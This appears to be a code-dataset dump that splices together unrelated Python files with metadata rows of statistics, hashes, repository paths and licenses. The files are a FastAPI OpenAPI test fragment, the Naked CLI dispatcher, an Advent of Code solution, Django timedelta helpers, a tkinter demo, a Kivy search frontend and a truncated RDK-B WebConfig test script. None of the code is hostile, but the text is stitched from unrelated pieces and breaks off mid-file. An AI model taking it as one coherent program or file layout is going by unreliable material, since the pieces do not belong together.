"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"callbacks": {
"post_callback": {
"/post-callback": {
"post": {
"summary": "Post Callback",
"operationId": "baz_post_callback",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_baz_post_callback"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Baz Post Callback",
"type": "array",
"items": {
"$ref": "#/components/schemas/Item"
},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Baz Post Callback",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
}
}
},
}
},
"/tocallback": {
"post": {
"summary": "Post With Callback",
"operationId": "foo_post_with_callback",
"requestBody": {
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/Body_foo_post_with_callback"
}
}
},
"required": True,
},
"responses": {
"200": {
"description": "Successful Response",
"content": {
"application/json": {
"schema": {
"title": "Response Foo Post With Callback",
"type": "array",
"items": {"$ref": "#/components/schemas/Item"},
}
}
},
},
"404": {
"description": "Not Found",
"content": {
"application/json": {
"schema": {
"title": "Response 404 Foo Post With Callback",
"type": "array",
"items": {
"$ref": "#/components/schemas/Message"
},
}
}
},
},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
}
},
},
"components": {
"schemas": {
"Body_baz_post_callback": {
"title": "Body_baz_post_callback",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_baz_post_root": {
"title": "Body_baz_post_root",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"Body_foo_post_with_callback": {
"title": "Body_foo_post_with_callback",
"required": ["item1", "item2"],
"type": "object",
"properties": {
"item1": {"$ref": "#/components/schemas/Item"},
"item2": {"$ref": "#/components/schemas/Item"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
"Item": {
"title": "Item",
"required": ["name", "price"],
"type": "object",
"properties": {
"name": {"title": "Name", "type": "string"},
"price": {"title": "Price", "type": "number"},
},
},
"Message": {
"title": "Message",
"required": ["title", "description"],
"type": "object",
"properties": {
"title": {"title": "Title", "type": "string"},
"description": {"title": "Description", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"anyOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
}
},
}
def test_warn_duplicate_operation_id():
def broken_operation_id(route: APIRoute):
return "foo"
app = FastAPI(generate_unique_id_function=broken_operation_id)
@app.post("/")
def post_root(item1: Item):
return item1 # pragma: nocover
@app.post("/second")
def post_second(item1: Item):
return item1 # pragma: nocover
@app.post("/third")
def post_third(item1: Item):
return item1 # pragma: nocover
client = TestClient(app)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
client.get("/openapi.json")
assert len(w) == 2
assert issubclass(w[-1].category, UserWarning)
assert "Duplicate Operation ID" in str(w[-1].message)
| 41.772059
| 106
| 0.285161
| 114
| 0.001672
| 0
| 0
| 3,794
| 0.055653
| 0
| 0
| 19,117
| 0.280423
|
0b5218f0be7a06f3e5bb1ddae6a9fce7c35741e8
| 11,880
|
py
|
Python
|
hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/app.py
|
hallohubo/DjangoDocterAPI
|
2d86d17c718affa968c0b2d4f9590aa08d43716e
|
[
"Apache-2.0"
] | 89
|
2015-04-10T14:34:05.000Z
|
2021-11-08T09:17:09.000Z
|
hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/app.py
|
hallohubo/DjangoDocterAPI
|
2d86d17c718affa968c0b2d4f9590aa08d43716e
|
[
"Apache-2.0"
] | 13
|
2015-03-17T15:44:41.000Z
|
2020-11-19T03:07:13.000Z
|
hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/app.py
|
hallohubo/DjangoDocterAPI
|
2d86d17c718affa968c0b2d4f9590aa08d43716e
|
[
"Apache-2.0"
] | 19
|
2015-05-13T09:18:12.000Z
|
2021-04-28T10:35:39.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#------------------------------------------------------------------------------
# Naked | A Python command line application framework
# Copyright 2014 Christopher Simpkins
# MIT License
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
# c.cmd = Primary command (<executable> <primary command>)
# c.cmd2 = Secondary command (<executable> <primary command> <secondary command>)
#
# c.option(option_string, [bool argument_required]) = test for option with optional test for positional arg to the option
# c.option_with_arg(option_string) = test for option and mandatory positional argument to option test
# c.flag(flag_string) = test for presence of a "--option=argument" style flag
#
# c.arg(arg_string) = returns the next positional argument to the arg_string argument
# c.flag_arg(flag_string) = returns the flag assignment for a "--option=argument" style flag
#------------------------------------------------------------------------------------
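# Illustration (hypothetical invocation `naked test tox py27`; attribute
# semantics inferred from the checks in main() below):
#   c = Command(sys.argv[0], sys.argv[1:])
#   c.cmd   -> 'test'   # primary command
#   c.cmd2  -> 'tox'    # secondary command
#   c.arg2  -> 'py27'   # positional argument consumed by the tox branch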
# Application start
def main():
import sys
from Naked.commandline import Command
#from Naked.toolshed.state import StateObject
from Naked.toolshed.system import stderr
#------------------------------------------------------------------------------------------
# [ Instantiate command line object ]
# used for all subsequent conditional logic in the CLI application
#------------------------------------------------------------------------------------------
c = Command(sys.argv[0], sys.argv[1:])
#------------------------------------------------------------------------------
# [ Instantiate state object ]
#------------------------------------------------------------------------------
#state = StateObject()
#------------------------------------------------------------------------------------------
# [ Command Suite Validation ] - early validation of appropriate command syntax
# Test that user entered a primary command, print usage if not
#------------------------------------------------------------------------------------------
if not c.command_suite_validates():
from Naked.commands.usage import Usage
Usage().print_usage()
sys.exit(1)
#------------------------------------------------------------------------------------------
# [ PRIMARY COMMAND LOGIC ]
# Test for primary commands and handle them
#------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# [ args ] - identify the parsed arguments for a command string (2)= help
#------------------------------------------------------------------------------
if c.cmd == "args":
if c.cmd2 == "help":
from Naked.commands.args import help as args_help
args_help()
        elif c.argc > 0:  # there is an argument to the args command that is not help
from Naked.commands.args import Args
a = Args(c.arg_to_cmd)
a.run()
else:
stderr("The args command requires an example command as an argument. Use 'naked args help' for more information.", 1)
#------------------------------------------------------------------------------
# [ build ] - build the C code in the Naked library (2)= help
#------------------------------------------------------------------------------
elif c.cmd == "build":
if c.cmd2 == "help":
from Naked.commands.build import help as build_help
build_help()
else:
from Naked.commands.build import compile_c_code
import os, inspect
abs_dirpath = os.path.join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))), "toolshed", "c")
compile_c_code(abs_dirpath) # function calls exit status code
#------------------------------------------------------------------------------
# [ classify ] - search Python application classifiers and display to user (args)-search string
#------------------------------------------------------------------------------
elif c.cmd == "classify":
if c.cmd2 == "help":
from Naked.commands.classifier import help as classifier_help
classifier_help()
else:
if c.second: # if search string was given
search_string = c.second
else:
search_string = "" # absence of search string detected in Classifier, defaults to the entire list instead of search
            from Naked.commands.classifier import Classifier
            classifier = Classifier(search_string)  # avoid rebinding c, which holds the Command object
            classifier.run()
#------------------------------------------------------------------------------
# [ dist ] - distribute source files to PyPI (2)=register, sdist, swheel, wheel, win, all, help
#------------------------------------------------------------------------------
elif c.cmd == "dist":
if c.argc > 1:
from Naked.commands.dist import Dist
d = Dist()
if c.cmd2 == "register": # python setup.py register
d.run('register')
elif c.cmd2 == "sdist": # python setup.py sdist upload
d.run('sdist')
elif c.cmd2 == "swheel": # python setup.py sdist bdist_wheel upload
d.run('swheel')
elif c.cmd2 == "wheel": # python setup.py bdist_wheel upload
d.run('wheel')
elif c.cmd2 == "win": # python setup.py bdist_wininst upload
d.run('win')
elif c.cmd2 == "all": # python setup.py sdist bdist_wheel bdist_wininst upload
d.run('all')
elif c.cmd2 == "help": # help for command
from Naked.commands.dist import help as dist_help
dist_help()
else:
stderr("The naked dist secondary command was not recognized. Use 'naked dist help' for more information.", 1)
else:
stderr("Please enter a secondary command", 1)
#------------------------------------------------------------------------------
# [ locate ] - locate Naked project files (2)= main, settings, setup, help
#------------------------------------------------------------------------------
elif c.cmd == "locate":
from Naked.commands.locate import Locator
if c.cmd2 == "help":
from Naked.commands.locate import help as locate_help
locate_help()
elif c.cmd2 == "main":
l = Locator('main')
elif c.cmd2 == "settings":
l = Locator('settings')
elif c.cmd2 == "setup":
l = Locator('setup')
else:
l = Locator('') #handles error report to user
#------------------------------------------------------------------------------
# [ make ] - make a new Naked project (2)=help (args)=project name
#------------------------------------------------------------------------------
elif c.cmd == "make":
from Naked.commands.make import MakeController
if c.cmd2 == "help":
from Naked.commands.make import help as make_help
make_help()
if c.arg1: # arg1 is not help so use it as the argument to the make command
m = MakeController(c.arg1)
else:
m = MakeController(None)
m.run()
#------------------------------------------------------------------------------
# [ profile ] - run the profiler.py file in the Naked project (2)=help
#------------------------------------------------------------------------------
elif c.cmd == "profile":
if c.cmd2 == "help":
from Naked.commands.profile import help as profile_help
profile_help()
else:
from Naked.commands.profile import Profiler
p = Profiler()
p.run()
#------------------------------------------------------------------------------
# [ pyh ] - help for python built-in library modules, classes, methods, functions
#------------------------------------------------------------------------------
elif c.cmd == "pyh":
if c.cmd2 == "help":
from Naked.commands.pyh import pyh_help
pyh_help()
else:
if c.argc > 1:
from Naked.commands.pyh import python_help
python_help(c.arg1)
else:
stderr("Please enter a query term with the pyh command. Use 'naked pyh help' for more information.", 1)
#------------------------------------------------------------------------------
# [ test ] - Run unit tests on the project (2)= help,nose,pytest,tox,unittest (see help for args)
#------------------------------------------------------------------------------
elif c.cmd == "test":
if c.argc > 1:
if c.cmd2 == "help":
from Naked.commands.test import help as tox_help
tox_help()
elif c.cmd2 == "nose":
from Naked.commands.test import NoseTester
n = NoseTester()
n.run()
elif c.cmd2 == "pytest":
from Naked.commands.test import PyTester
p = PyTester()
p.run()
elif c.cmd2 == "tox":
from Naked.commands.test import ToxTester
if c.arg2: #user specified a python version to run with one of the tox version defs
t = ToxTester(c.arg2) #instantiate with the python version
else:
t = ToxTester()
t.run()
elif c.cmd2 == "unittest":
from Naked.commands.test import UnitTester
if c.arg2:
t = UnitTester(c.arg2)
t.run()
else:
stderr("Please include a unit test file path. Use 'naked test help' for more information.", 1)
else:
stderr("The secondary command was not recognized. Use 'naked test help' for more information.", 1)
else:
stderr("Please include a secondary command with the 'naked test' command. Use 'naked dist help' for more information.", 1)
#------------------------------------------------------------------------------------------
# [ NAKED FRAMEWORK COMMANDS ]
# Naked framework provides default help, usage, and version commands for all applications
# --> settings for user messages are assigned in the lib/PROJECT/settings.py file
#------------------------------------------------------------------------------------------
elif c.help(): # User requested naked help (help.py module in commands directory)
from Naked.commands.help import Help
Help().print_help()
elif c.usage(): # user requested naked usage info (usage.py module in commands directory)
from Naked.commands.usage import Usage
Usage().print_usage()
elif c.version(): # user requested naked version (version.py module in commands directory)
from Naked.commands.version import Version
Version().print_version()
#------------------------------------------------------------------------------------------
# [ DEFAULT MESSAGE FOR MATCH FAILURE ]
# Message to provide to the user when all above conditional logic fails to meet a true condition
#------------------------------------------------------------------------------------------
else:
print("Could not complete the command that you entered. Please try again.")
sys.exit(1) #exit
if __name__ == '__main__':
main()
| 51.652174
| 135
| 0.448485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,913
| 0.581902
|
0b57844b6fc847c94e6d69c32ba1624b13f6dfa7
| 366
|
py
|
Python
|
codes/day7_task1.py
|
tayyrov/AdventOfCode
|
69003407fd345ea76f8125b4b132e5b5d5ea33ab
|
[
"MIT"
] | 1
|
2021-12-07T10:54:48.000Z
|
2021-12-07T10:54:48.000Z
|
codes/day7_task1.py
|
tayyrov/AdventOfCode
|
69003407fd345ea76f8125b4b132e5b5d5ea33ab
|
[
"MIT"
] | null | null | null |
codes/day7_task1.py
|
tayyrov/AdventOfCode
|
69003407fd345ea76f8125b4b132e5b5d5ea33ab
|
[
"MIT"
] | null | null | null |
"""
Advent Of Code 2021
Day 7
Date: 07-12-2021
Site: https://adventofcode.com/2021/day/7
Author: Tayyrov
"""
with open('../input_files/day7_input', 'r') as file1:
    numbers = list(map(int, file1.readline().split(",")))
numbers.sort()
# the median minimizes the sum of absolute distances, so align on it
middle = numbers[len(numbers)//2]
ans = 0
for n in numbers:
    ans += abs(middle - n)
print(ans)
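A quick sanity check against the published example from the puzzle statement (the sample crab positions align best at 2 for a total cost of 37):
crabs = [16, 1, 2, 0, 4, 2, 7, 1, 2, 14]
best = min(range(max(crabs) + 1), key=lambda p: sum(abs(p - c) for c in crabs))
assert best == 2 and sum(abs(best - c) for c in crabs) == 37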
| 15.25
| 58
| 0.620219
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 147
| 0.401639
|
0b57f9e75344dd34d7fe38dc10faa58dd476ec48
| 4,270
|
py
|
Python
|
events/utils.py
|
ewjoachim/pythondotorg
|
382741cc6208fc56aa827cdd1da41983fb7e6ba8
|
[
"Apache-2.0"
] | null | null | null |
events/utils.py
|
ewjoachim/pythondotorg
|
382741cc6208fc56aa827cdd1da41983fb7e6ba8
|
[
"Apache-2.0"
] | null | null | null |
events/utils.py
|
ewjoachim/pythondotorg
|
382741cc6208fc56aa827cdd1da41983fb7e6ba8
|
[
"Apache-2.0"
] | null | null | null |
import datetime
import re
import pytz
from django.utils.timezone import make_aware, is_aware
def seconds_resolution(dt):
return dt - dt.microsecond * datetime.timedelta(0, 0, 1)
def minutes_resolution(dt):
return dt - dt.second * datetime.timedelta(0, 1, 0) - dt.microsecond * datetime.timedelta(0, 0, 1)
def date_to_datetime(date, tzinfo=None):
if tzinfo is None:
tzinfo = pytz.UTC
return datetime.datetime(*date.timetuple()[:6], tzinfo=tzinfo)
def extract_date_or_datetime(dt):
if isinstance(dt, datetime.datetime):
return convert_dt_to_aware(dt)
return dt
def convert_dt_to_aware(dt):
if not isinstance(dt, datetime.datetime):
dt = date_to_datetime(dt)
if not is_aware(dt):
# we don't want to use get_current_timezone() because
# settings.TIME_ZONE may be set something different than
# UTC in the future
return make_aware(dt, timezone=pytz.UTC)
return dt
def timedelta_nice_repr(timedelta, display='long', sep=', '):
"""
Turns a datetime.timedelta object into a nice string repr.
'display' can be 'minimal', 'short' or 'long' (default).
Taken from bitbucket.org/schinckel/django-timedelta-field.
'sql' and 'iso8601' support have been removed.
"""
if not isinstance(timedelta, datetime.timedelta):
raise TypeError('First argument must be a timedelta.')
result = []
weeks = int(timedelta.days / 7)
days = timedelta.days % 7
hours = int(timedelta.seconds / 3600)
minutes = int((timedelta.seconds % 3600) / 60)
seconds = timedelta.seconds % 60
if display == 'minimal':
words = ['w', 'd', 'h', 'm', 's']
elif display == 'short':
words = [' wks', ' days', ' hrs', ' min', ' sec']
elif display == 'long':
words = [' weeks', ' days', ' hours', ' minutes', ' seconds']
else:
# Use django template-style formatting.
# Valid values are d, g, G, h, H, i, s.
return re.sub(r'([dgGhHis])', lambda x: '%%(%s)s' % x.group(), display) % {
'd': days,
'g': hours,
'G': hours if hours > 9 else '0%s' % hours,
'h': hours,
'H': hours if hours > 9 else '0%s' % hours,
'i': minutes if minutes > 9 else '0%s' % minutes,
's': seconds if seconds > 9 else '0%s' % seconds
}
values = [weeks, days, hours, minutes, seconds]
for i in range(len(values)):
if values[i]:
if values[i] == 1 and len(words[i]) > 1:
result.append('%i%s' % (values[i], words[i].rstrip('s')))
else:
result.append('%i%s' % (values[i], words[i]))
    # Every field was zero (e.g. a sub-second timedelta):
    if len(result) == 0:
        # display as 0 of the smallest unit
        result.append('0%s' % (words[-1]))
return sep.join(result)
def timedelta_parse(string):
"""
Parse a string into a timedelta object.
Taken from bitbucket.org/schinckel/django-timedelta-field.
"""
string = string.strip()
if not string:
raise TypeError(f'{string!r} is not a valid time interval')
    # This is the format we sometimes get from PostgreSQL, sqlite,
    # and from serialization.
d = re.match(
r'^((?P<days>[-+]?\d+) days?,? )?(?P<sign>[-+]?)(?P<hours>\d+):'
r'(?P<minutes>\d+)(:(?P<seconds>\d+(\.\d+)?))?$',
string
)
if d:
d = d.groupdict(0)
if d['sign'] == '-':
for k in 'hours', 'minutes', 'seconds':
d[k] = '-' + d[k]
d.pop('sign', None)
else:
# This is the more flexible format.
d = re.match(
r'^((?P<weeks>-?((\d*\.\d+)|\d+))\W*w((ee)?(k(s)?)?)(,)?\W*)?'
r'((?P<days>-?((\d*\.\d+)|\d+))\W*d(ay(s)?)?(,)?\W*)?'
r'((?P<hours>-?((\d*\.\d+)|\d+))\W*h(ou)?(r(s)?)?(,)?\W*)?'
r'((?P<minutes>-?((\d*\.\d+)|\d+))\W*m(in(ute)?(s)?)?(,)?\W*)?'
r'((?P<seconds>-?((\d*\.\d+)|\d+))\W*s(ec(ond)?(s)?)?)?\W*$',
string
)
if not d:
raise TypeError(f'{string!r} is not a valid time interval')
d = d.groupdict(0)
return datetime.timedelta(**{k: float(v) for k, v in d.items()})
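An illustrative round-trip through the two helpers above (values traced by hand against the parsing regexes):
from datetime import timedelta
# from events.utils import timedelta_nice_repr, timedelta_parse  (module path as in this repo)

td = timedelta(weeks=1, days=2, hours=3)
print(timedelta_nice_repr(td, display='short'))  # 1 wk, 2 days, 3 hrs
print(timedelta_parse('1 wk, 2 days, 3 hrs'))    # 9 days, 3:00:00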
| 34.16
| 102
| 0.545902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,577
| 0.369321
|
0b59207603dace13de5bad24d570481b2383557b
| 4,282
|
py
|
Python
|
frontend/main.py
|
loukwn/klougle
|
45432841c594ced36437566f416e9c71017f83a5
|
[
"MIT"
] | 2
|
2018-10-26T11:06:51.000Z
|
2020-04-29T13:38:13.000Z
|
frontend/main.py
|
loukwn/klougle
|
45432841c594ced36437566f416e9c71017f83a5
|
[
"MIT"
] | null | null | null |
frontend/main.py
|
loukwn/klougle
|
45432841c594ced36437566f416e9c71017f83a5
|
[
"MIT"
] | null | null | null |
import json
import operator
import os
import webbrowser
from timeit import default_timer as timer
from kivy.app import App
from kivy.config import Config
from kivy.properties import ObjectProperty
from kivy.uix.stacklayout import StackLayout
from nltk.stem.wordnet import WordNetLemmatizer
Config.set('input', 'mouse', 'mouse,multitouch_on_demand')
INV_IDX_NAME = 'inv_index.json'
_wordnet_lemmatizer = WordNetLemmatizer()
_wordnet_lemmatizer.lemmatize('asd')  # warm-up call: triggers the lazy WordNet corpus load at startup
def get_data_from_json():
# loads the inverted index in memory
rel_path = "inv_index/" + INV_IDX_NAME
abs_file_path = os.path.join(os.pardir, rel_path)
with open(abs_file_path) as data_file:
return json.load(data_file)
def get_doc_details(key):
    # uses the id of the document to find its location on disk and then returns its title and its link
temp = key.split('_')
partial_path = 'crawlers/crawled/' + temp[0] + '/' + temp[1] + '/' + temp[2] + '.json'
abs_file_path = os.path.join(os.pardir, partial_path)
with open(abs_file_path) as f:
j = json.load(f)
return [j['title'], j['link']]
def perform_query(query):
# we process the query (split/lemmatize/turn to lowercase)
terms = [_wordnet_lemmatizer.lemmatize(x.strip().lower()) for x in query.split()]
data = get_data_from_json()
# the dictionary that will hold the document results
docs_returned = {}
    # for every term in the query we look up the corresponding lemma in the inverted index
    for lemma in data:
        if lemma in terms:
            # the term exists in the inverted index
for i in data[lemma]:
# we add its weight to the docs_returned structure
if i['id'] not in docs_returned:
docs_returned[i['id']] = i['w']
else:
docs_returned[i['id']] += i['w']
# we sort the docs based on their values (descending)
sorted_x = sorted(docs_returned.items(), key=operator.itemgetter(1), reverse=True)
to_return = []
count = 1
for key, value in sorted_x:
# and for every doc we extract the title and link so that we can show them
[title, link] = get_doc_details(key)
title = str(count) + ') ' + title
to_return.append([title, link, value])
count += 1
return to_return
# -------------------------- UI -------------------------- #
def open_url(text):
    # clicking an item opens its link in the browser
webbrowser.open(text.split('\n')[0], new=2)
# top layout of UI
class SearchUI(StackLayout):
statusLabel = ObjectProperty()
resultList = ObjectProperty()
searchInput = ObjectProperty()
def add_result_to_list_view(self, title, link, weight):
resized_link = link
if len(resized_link) >= 102:
resized_link = resized_link[0:102] + '...'
content = link + '\n[size=16][b]' + title + '[/b][/size]\n-- [size=15][color=#757575][i]Weight: ' + str(
weight) + '[/i][/color]\n[color=#3F51B5]' + resized_link + '[/size][/color]'
self.resultList.adapter.data.extend([content])
self.resultList._trigger_reset_populate()
def go_pressed(self):
query = self.searchInput.text.strip()
if len(query) > 0:
self.clear_list()
self.statusLabel.text = "Searching.."
start = timer() #
results = perform_query(query) # query to inverted index happens (and is timed) here
end = timer() #
if len(results) > 0:
for doc in results:
self.add_result_to_list_view(doc[0], doc[1], doc[2])
self.statusLabel.text = "Results: " + str(
len(self.resultList.adapter.data)) + " (Time elapsed: " + "{:10.4f}s) ".format(end - start)
else:
self.statusLabel.text = "No results.."
else:
self.clear_list()
self.statusLabel.text = 'Type some search terms and hit "Go"'
def clear_list(self):
del self.resultList.adapter.data[:]
# kivy app
class SearchApp(App):
def build(self):
return SearchUI()
# starting point
if __name__ == '__main__':
SearchApp().run()
| 34.532258
| 115
| 0.609295
| 1,647
| 0.384633
| 0
| 0
| 0
| 0
| 0
| 0
| 1,149
| 0.268333
|
0b5a05b2b3ff689eda558db7efd7ba2b693f4a50
| 1,244
|
py
|
Python
|
test.py
|
richisusiljacob/VideoTo360VR
|
14c176cfbe90fd7cf113cbdd2d4edf447c001894
|
[
"MIT"
] | 5
|
2021-08-06T11:26:56.000Z
|
2022-03-17T09:06:07.000Z
|
test.py
|
richisusiljacob/VideoTo360VR
|
14c176cfbe90fd7cf113cbdd2d4edf447c001894
|
[
"MIT"
] | 8
|
2021-07-03T08:08:00.000Z
|
2021-07-09T06:59:34.000Z
|
test.py
|
richisusiljacob/VideoTo360VR
|
14c176cfbe90fd7cf113cbdd2d4edf447c001894
|
[
"MIT"
] | 2
|
2021-07-02T09:19:09.000Z
|
2021-07-04T13:34:30.000Z
|
from tkinter import *
import tkinter.ttk as ttk
from PIL import ImageTk,Image
""" root = Tk()
canvas = Canvas(root, width = 300, height = 300)
canvas.pack()
img = ImageTk.PhotoImage(Image.open("output/collage1/FinalCollage.jpg"))
canvas.create_image(0,0,anchor=NW, image=img)
root.mainloop() """
root = Tk()
root.title("Tab Widget")
tabControl = ttk.Notebook(root)
tab1 = ttk.Frame(tabControl)
tab2 = ttk.Frame(tabControl)
tabControl.add(tab1, text ='Tab 1')
tabControl.add(tab2, text ='Tab 2')
tabControl.pack(expand = 1, fill ="both")
ttk.Label(tab1,
text ="Welcome to \
GeeksForGeeks").grid(column = 0,
row = 0,
padx = 30,
pady = 30)
canvas = Canvas(tab1, width = 300, height = 300)
canvas.grid(column= 1, row =0)
img = ImageTk.PhotoImage(Image.open("output/collage1/FinalCollage.jpg"))
canvas.create_image(0,0,anchor=NW, image=img)
ttk.Label(tab2,
text ="Lets dive into the\
world of computers").grid(column = 0,
row = 0,
padx = 30,
pady = 30)
root.mainloop()
| 31.1
| 74
| 0.553859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 381
| 0.30627
|
0b5a82c329031fc6f172ed423012d36ab20bca44
| 10,817
|
py
|
Python
|
testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2021 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>1</version>
<name>TS_WEBCONFIG_DisableRFC_QuerySyncParams</name>
<primitive_test_id/>
<primitive_test_name>Webconfig_DoNothing</primitive_test_name>
<primitive_test_version>1</primitive_test_version>
<status>FREE</status>
<synopsis>To disable the Webconfig RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</synopsis>
<groups_id/>
<execution_time>10</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_WEBCONFIG_02</test_case_id>
<test_objective>This test case is to disable the RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components in DUT should be in a running state that includes component under test Cable Modem
2.TDK Agent should be in running state or invoke it through StartTdk.sh script
3.Webconfig distro should be enabled else enable with custom image</pre_requisite>
<api_or_interface_used>pam_GetParameterValues
pam_SetParameterValues</api_or_interface_used>
<input_parameters>Device.X_RDK_WebConfig.RfcEnable
Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck
Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"</input_parameters>
<automation_approch>1.Load the module
2.Get the current webconfig RFC enable status and disable the RFC
3.Do a get operation on Force Sync check and Force Sync Check Ok parameters
4.Check if DB failed message specific to the parameter is logged in WebConfig.log File
5.Revert the RFC status to previous
6.Unload the module</automation_approch>
<expected_output>When webconfig RFC is disabled and get operation done on Force Sync parameters should log Db failed message specific to the parameter in webConfig.log file</expected_output>
<priority>High</priority>
<test_stub_interface>WEBCONFIG</test_stub_interface>
<test_script>TS_WEBCONFIG_DisableRFC_QuerySyncParams</test_script>
<skipped>No</skipped>
<release_version>M86</release_version>
<remarks>None</remarks>
</test_cases>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
import tdkutility
from tdkutility import *
from time import sleep;
#Test component to be tested
sysobj = tdklib.TDKScriptingLibrary("sysutil","1");
pamobj = tdklib.TDKScriptingLibrary("pam","1");
#IP and Port of box, no need to change;
#this will be replaced with the corresponding box IP and port while executing the script
ip = <ipaddress>
port = <port>
pamobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
sysobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
#Get the result of connection with test component and DUT
pamloadmodulestatus =pamobj.getLoadModuleResult();
sysloadmodulestatus =sysobj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %pamloadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %sysloadmodulestatus ;
revert = 0;
if "SUCCESS" in pamloadmodulestatus.upper() and "SUCCESS" in sysloadmodulestatus.upper():
#Set the result status of execution
pamobj.setLoadModuleStatus("SUCCESS");
sysobj.setLoadModuleStatus("SUCCESS");
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
initial_value = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue","false");
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
revert =1;
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
paramlist = ["Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck","Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"];
